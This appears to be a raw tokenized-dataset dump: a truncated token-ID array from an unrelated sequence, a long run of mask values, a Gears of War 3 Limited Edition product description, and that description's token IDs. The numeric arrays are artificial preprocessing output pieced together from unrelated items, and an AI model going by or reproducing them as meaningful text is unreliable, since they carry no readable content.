29883, 10474, 29889, 21287, 14936, 22130, 13, 12, 12, 12, 18714, 14936, 353, 20238, 29961, 29875, 1822, 29883, 10474, 29889, 21287, 14936, 890, 13, 12, 12, 361, 5135, 29878, 6916, 29961, 29875, 1822, 25367, 29889, 8003, 580, 1275, 926, 29897, 2607, 313, 18714, 14936, 529, 20238, 29961, 29875, 1822, 25367, 29889, 21287, 14936, 22130, 13, 12, 12, 12, 18714, 14936, 353, 20238, 29961, 29875, 1822, 25367, 29889, 21287, 14936, 890, 13, 12, 29913, 13, 12, 2457, 6901, 14936, 29936, 13, 29913, 13, 13, 5405, 27930, 1057, 18759, 580, 426, 13, 12, 29878, 6916, 29889, 8551, 890, 13, 12, 29878, 6916, 29889, 5910, 29918, 1627, 29898, 15097, 6069, 3310, 13, 12, 3396, 6069, 353, 20238, 29889, 2311, 580, 448, 29871, 29896, 29936, 13, 12, 2838, 1542, 353, 5535, 3835, 29936, 13, 12, 11631, 5647, 1975, 353, 2089, 29936, 13, 12, 29878, 6916, 29961, 3396, 6069, 1822, 27175, 890, 13, 12, 3881, 7364, 6825, 29889, 27175, 890, 13, 29913, 13, 13, 5405, 27930, 1057, 15941, 29928, 786, 15815, 580, 426, 13, 12, 1454, 313, 2311, 29918, 29873, 474, 29922, 29900, 29936, 474, 29966, 29878, 6916, 29889, 2311, 580, 29899, 29896, 29936, 474, 4862, 426, 13, 12, 12, 361, 313, 29878, 6916, 29961, 29875, 1822, 8915, 3101, 426, 13, 12, 12, 12, 2311, 29918, 29873, 432, 29922, 29875, 29974, 29896, 29936, 13, 12, 12, 12, 8000, 313, 29926, 29966, 29878, 6916, 29889, 2311, 3101, 426, 13, 12, 12, 12, 12, 361, 313, 29878, 6916, 29961, 29875, 29962, 1275, 20238, 29961, 29926, 2314, 426, 13, 12, 12, 12, 12, 12, 29878, 6916, 29889, 261, 559, 29898, 29878, 6916, 29889, 463, 580, 718, 432, 416, 13, 12, 12, 12, 12, 12, 361, 313, 3396, 6069, 6736, 432, 29897, 13, 12, 12, 12, 12, 12, 12, 3396, 6069, 489, 29936, 13, 12, 12, 12, 12, 29913, 1683, 426, 13, 12, 12, 12, 12, 12, 29926, 9107, 13, 12, 12, 12, 12, 29913, 13, 12, 12, 12, 29913, 13, 12, 12, 29913, 13, 12, 29913, 13, 29913, 13, 13, 5405, 27930, 1057, 21281, 403, 6330, 580, 426, 13, 12, 3396, 6069, 353, 313, 3396, 6069, 718, 29871, 29896, 29897, 1273, 20238, 29889, 2311, 890, 13, 29913, 13, 13 ]
[ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ]
Learn more about Gears of War 3 Limited Edition: Product DescriptionGears of War 3 is the spectacular conclusion to one of the most memorable and celebrated sagas in videogames. Developed by Epic Games exclusively for Xbox 360, Gears of War 3 plunges players into a harrowing tale of hope, survival and brotherhood.In Gears of War 3 players fight on as Marcus Fenix, the grizzled war hero and leader of Delta Squad. Eighteen months after the fall of the last human city, the war against the Locust rages on. Meanwhile, deep beneath the surface, a fearsome new threat is infecting the planet from within. With survivors scattered and civilization in ruins, time is running out for Marcus and his comrades as they fight to save the human race.The Gears of War 3 series is one of the most popular franchises in Xbox history, with more than 12 million games sold worldwide, an upcoming film, New York Times best-selling novels and more. Features The Limited Edition intensifies and expands the action with exclusive digital content, and enhances your battle experience with a wealth of collector's items: Discover the fate of Marcus and his surviving comrades in this immersive and emotionally engaging story Experience new co-op and competitive multiplayer play, whether you're a veteran player or a rookie (Xbox LIVE Gold membership required for online multiplayer game play) Experience the epic finale to the Gears of War trilogy and fight alongside Delta Squad to rescue humanity Enjoy improved graphics, animation, and lighting that immerse you in the destroyed beauty of the rich environments Game DescriptionGears of War 3Developer: Epic Games, Inc.Publisher: Microsoft Game StudiosAbout “Gears of War”Published by Microsoft Game Studios, the “Gears of War” franchise has won over 30 “Game of the Year” awards, sold more than 12 million copies worldwide and redefined the third-person shooter genre for this console generation. The game has also inspired a full line of toys and collectibles, apparel, an upcoming film, graphic novels and a book series by New York Times best-selling author Karen Traviss. The “Gears of War” series is exclusive to the Xbox 360 videogame and entertainment system and its riveting multiplayer action makes it one of the most popular titles on Xbox LIVE. About Epic Games, Inc.Epic Games, Inc., based in Cary, NC and established in 1991, develops cutting-edge games and game engine technology, including the multiple million-selling, award-winning “Unreal” and “Gears of War” series, and the industry leading Unreal Engine 3 game engine, a four-time winner of Game Developer magazine’s Best Engine Front Line Award and Hall of Fame inductee.
[ 1, 19530, 29876, 901, 1048, 402, 15451, 310, 3362, 29871, 29941, 28873, 17138, 29901, 13, 13, 7566, 12953, 29954, 15451, 310, 3362, 29871, 29941, 338, 278, 6683, 562, 1070, 15997, 304, 697, 310, 278, 1556, 26959, 519, 322, 26301, 17233, 294, 297, 18900, 468, 1280, 29889, 10682, 287, 491, 14055, 293, 12482, 13489, 3598, 363, 1060, 1884, 29871, 29941, 29953, 29900, 29892, 402, 15451, 310, 3362, 29871, 29941, 715, 686, 267, 10769, 964, 263, 298, 2936, 292, 17694, 310, 4966, 29892, 10503, 2561, 322, 8099, 6614, 29889, 797, 402, 15451, 310, 3362, 29871, 29941, 10769, 8589, 373, 408, 27390, 20685, 861, 29892, 278, 330, 374, 5617, 839, 1370, 13444, 322, 11822, 310, 360, 2554, 18827, 29889, 382, 1141, 9404, 7378, 1156, 278, 6416, 310, 278, 1833, 5199, 4272, 29892, 278, 1370, 2750, 278, 5976, 504, 1153, 2710, 373, 29889, 25065, 29892, 6483, 19540, 278, 7101, 29892, 263, 8866, 5372, 716, 28469, 338, 3041, 522, 292, 278, 15754, 515, 2629, 29889, 2973, 10503, 440, 943, 29574, 322, 7631, 2133, 297, 5796, 1144, 29892, 931, 338, 2734, 714, 363, 27390, 322, 670, 419, 29878, 3076, 408, 896, 8589, 304, 4078, 278, 5199, 8175, 29889, 1576, 402, 15451, 310, 3362, 29871, 29941, 3652, 338, 697, 310, 278, 1556, 5972, 23272, 4637, 297, 1060, 1884, 4955, 29892, 411, 901, 1135, 29871, 29896, 29906, 7284, 8090, 5239, 3186, 8157, 29892, 385, 701, 11506, 2706, 29892, 1570, 3088, 10277, 1900, 29899, 29879, 7807, 2420, 1379, 322, 901, 29889, 13, 13, 8263, 3698, 13, 13, 1576, 28873, 17138, 12838, 11057, 322, 1518, 4167, 278, 3158, 411, 29192, 13436, 2793, 29892, 322, 26371, 2925, 596, 10555, 7271, 411, 263, 17173, 310, 6314, 272, 29915, 29879, 4452, 29901, 13, 13, 4205, 11911, 278, 23779, 310, 27390, 322, 670, 10503, 4357, 419, 29878, 3076, 297, 445, 5198, 414, 573, 322, 953, 8194, 635, 3033, 6751, 5828, 13, 13, 1252, 546, 5597, 716, 1302, 29899, 459, 322, 5100, 3321, 2473, 9106, 1708, 29892, 3692, 366, 29915, 276, 263, 25808, 273, 4847, 470, 263, 696, 554, 347, 313, 29990, 1884, 365, 18474, 6650, 28512, 3734, 363, 7395, 2473, 9106, 3748, 1708, 29897, 13, 13, 1252, 546, 5597, 278, 9358, 293, 10996, 304, 278, 402, 15451, 310, 3362, 534, 309, 6933, 322, 8589, 19963, 360, 2554, 18827, 304, 26429, 5199, 537, 13, 13, 2369, 2212, 29891, 16710, 18533, 29892, 9612, 29892, 322, 3578, 292, 393, 14761, 344, 366, 297, 278, 14416, 15409, 310, 278, 8261, 23136, 13, 13, 14199, 12953, 29954, 15451, 310, 3362, 29871, 29941, 21956, 261, 29901, 14055, 293, 12482, 29892, 9266, 29889, 21076, 1674, 261, 29901, 7783, 8448, 23268, 28173, 1346, 29954, 15451, 310, 3362, 30024, 21076, 3726, 491, 7783, 8448, 23268, 29892, 278, 1346, 29954, 15451, 310, 3362, 30024, 23272, 895, 756, 2113, 975, 29871, 29941, 29900, 1346, 14199, 310, 278, 8905, 30024, 24441, 29892, 5239, 901, 1135, 29871, 29896, 29906, 7284, 14591, 3186, 8157, 322, 337, 12119, 278, 4654, 29899, 10532, 15049, 261, 16151, 363, 445, 2991, 12623, 29889, 450, 3748, 756, 884, 20603, 263, 2989, 1196, 310, 304, 952, 322, 6314, 13876, 29892, 623, 17243, 29892, 385, 701, 11506, 2706, 29892, 3983, 293, 2420, 1379, 322, 263, 3143, 3652, 491, 1570, 3088, 10277, 1900, 29899, 29879, 7807, 4148, 3467, 264, 3201, 29894, 790, 29889, 450, 1346, 29954, 15451, 310, 3362, 30024, 3652, 338, 29192, 304, 278, 1060, 1884, 29871, 29941, 29953, 29900, 18900, 468, 420, 322, 22684, 358, 1788, 322, 967, 9050, 15133, 2473, 9106, 3158, 3732, 372, 697, 310, 278, 1556, 5972, 17735, 373, 1060, 1884, 365, 18474, 29889, 13, 13, 28173, 14055, 293, 12482, 29892, 9266, 29889, 29923, 16447, 12482, 29892, 9266, 1696, 2729, 297, 315, 653, 29892, 25166, 322, 7841, 297, 29871, 29896, 29929, 29929, 29896, 29892, 2693, 29879, 28967, 29899, 12864, 8090, 322, 3748, 6012, 15483, 29892, 3704, 278, 2999, 7284, 29899, 29879, 7807, 29892, 9862, 29899, 5080, 1076, 1346, 2525, 6370, 30024, 322, 1346, 29954, 15451, 310, 3362, 30024, 3652, 29892, 322, 278, 13661, 8236, 853, 6370, 10863, 29871, 29941, 3748, 6012, 29892, 263, 3023, 29899, 2230, 19576, 310, 8448, 10682, 261, 14853, 30010, 29879, 6407, 10863, 13960, 7407, 7526, 322, 6573, 310, 21808, 22799, 3905, 29889 ]
